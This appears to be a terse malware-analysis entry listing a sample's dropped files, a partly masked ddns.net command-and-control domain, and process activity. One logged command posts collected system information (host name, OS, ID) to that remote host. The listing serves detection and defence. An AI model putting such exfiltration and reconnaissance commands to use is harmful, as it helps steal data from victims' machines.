Technical Information
- '<SYSTEM32>\taskkill.exe' /f /im Iclouding.exe
- %TEMP%\7ZipSfx.000\icloud.cmd
- %TEMP%\7ZipSfx.000\Iclouding.exe
- %TEMP%\7ZipSfx.000\maki.ini
- %TEMP%\7ZipSfx.000\systems.exe
- 'ka#####to01.ddns.net':80
- http://ka#####to01.ddns.net/
- DNS ASK ka#####to01.ddns.net
- ClassName: '' WindowName: ''
- '%TEMP%\7ZipSfx.000\Iclouding.exe' --post-data="comp=CRNJEUFU&id=CRNJEUFU_88E6680F&sysinfo=Host Name: CRNJEUFU+###OS Name: Microsoft Windows XP Professional+###OS Version: 5.1.260...
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\icloud.cmd" "
- '<SYSTEM32>\cmd.exe' /c vol c:
- '<SYSTEM32>\systeminfo.exe'